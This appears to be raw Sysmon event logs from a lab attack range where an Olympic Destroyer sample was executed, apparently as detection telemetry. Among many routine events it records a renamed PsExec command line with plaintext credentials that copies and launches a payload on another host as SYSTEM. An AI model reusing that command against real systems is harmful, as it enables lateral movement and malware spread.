10341000x8000000000000000293707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.146{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.146{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1389-6216-7206-000000003802}6684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.145{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1389-6216-7206-000000003802}6684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.144{C8EA50B7-1389-6216-7206-000000003802}6684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:19.562{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51441-false10.0.1.12-8000- 23542300x8000000000000000218146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:22.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB164FB953CC28837AE11569235F907,SHA256=9B3B1707BBF59B46ADB1217263F6568272555574DC81B787EF16E44EF20021CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2D9DE92BC00936DEB8B6AC95509B884,SHA256=DC674ED17E6B1C5EE96BC8F4AED34113F5B9D72306CB5B5C3C89050A2557C3F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.187{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.187{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:59:22.171{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.118{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-138A-6216-7406-000000003802}1188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.118{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-138A-6216-7406-000000003802}1188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.102{C8EA50B7-138A-6216-7406-000000003802}11881996C:\Windows\system32\conhost.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.070{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-138A-6216-7406-000000003802}1188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:22.049{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-138A-6216-7406-000000003802}1188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:23.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04DB766C474F8C2E6C1896402D67DD9C,SHA256=FD51216C3953D3BB9388AA4DC9C670332EB84ACD3D7267DDB79E04ACB14457AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:23.318{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42A168926086EF725F1EC40F14DA343F,SHA256=48C7B63BA0FE02B27CD9007D9512FA95686B3557FE6FF8E4241CD242A5AE68DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:24.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95421D5933C7CAEE024E79CA1DE77D0C,SHA256=499EF44B9D84514803DAE07514349F92C25FD7AE9C58FEA0C7428589BD697B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:24.333{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D048272AAFADB08D9504F047C7336793,SHA256=42E4A071EB9996AE1F17B7CA978437FA630867526232522BE09E89E85771D8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:25.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9C9F5DEA2DB30213942694EB275C90,SHA256=727976ACA38EFA5EDD73D0D8DFFCA23164ED12A102D63BF60AAE7640A50E01A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.823{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.817{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.808{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.335{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C541227A77B328FF3EB406CF5ABF9D95,SHA256=910077522981F53B224BF2052649BC039B9F1C6DBA47D6AE79311ECC6D3462D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:24.578{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51442-false10.0.1.12-8000- 23542300x8000000000000000218151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:26.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4083C415782023740792CE5EA90AF58F,SHA256=05B80B382277802042655FBBAFFF8F620A3594B91A4EBD88704293ED6C97B978,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000293763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000293762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0086a462) 13241300x8000000000000000293761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289c-0x0a7f7be9) 13241300x8000000000000000293760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a4-0x6c43e3e9) 